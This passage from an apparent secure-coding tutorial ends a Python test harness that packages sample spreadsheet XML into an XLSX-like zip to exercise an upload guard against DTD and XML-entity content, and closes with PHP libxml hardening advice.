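    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", b'<?xml version="1.0"?>'
                    b'<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("xl/workbook.xml", b'<?xml version="1.0"?>'
                    b'<workbook><sheets><sheet name="Sheet1" sheetId="1"/></sheets></workbook>')
        zf.writestr("xl/worksheets/sheet1.xml", sheet_xml)
        zf.writestr("docProps/thumbnail.jpeg", b"\xff\xd8\xff\xd9")  # skipped by the scanner
    return buf.getvalue()


if __name__ == "__main__":
    for sheet in (BENIGN_SHEET, DTD_SHEET):
        print(check_upload(build_xlsx_like(sheet)))
```

The guard runs before the file reaches any spreadsheet library, and it rejects on the first DTD construct rather than trying to decide whether a given entity is harmless. PHP code built on libxml can apply the same rule: load with `LIBXML_NONET`, never pass `LIBXML_NOENT`, and refuse any document whose `DOMDocument::$doctype` is non-null.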